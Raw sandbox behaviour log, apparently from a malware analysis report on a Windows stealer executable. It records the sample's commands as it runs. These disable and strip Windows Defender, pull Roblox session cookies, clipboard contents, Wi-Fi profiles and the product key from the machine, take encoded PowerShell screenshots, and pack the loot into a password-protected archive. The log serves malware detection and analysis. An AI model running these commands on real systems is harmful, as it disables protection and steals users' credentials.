              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73802Jump to behavior
              Source: e45AiBoV6X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: e45AiBoV6X.exeVirustotal: Detection: 50%
              Source: e45AiBoV6X.exeReversingLabs: Detection: 47%
              Source: e45AiBoV6X.exeString found in binary or memory: id-cmc-addExtensions
              Source: e45AiBoV6X.exeString found in binary or memory: set-addPolicy
              Source: e45AiBoV6X.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: e45AiBoV6X.exeString found in binary or memory: --help
              Source: e45AiBoV6X.exeString found in binary or memory: --help
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile read: C:\Users\user\Desktop\e45AiBoV6X.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"Jump to behavior
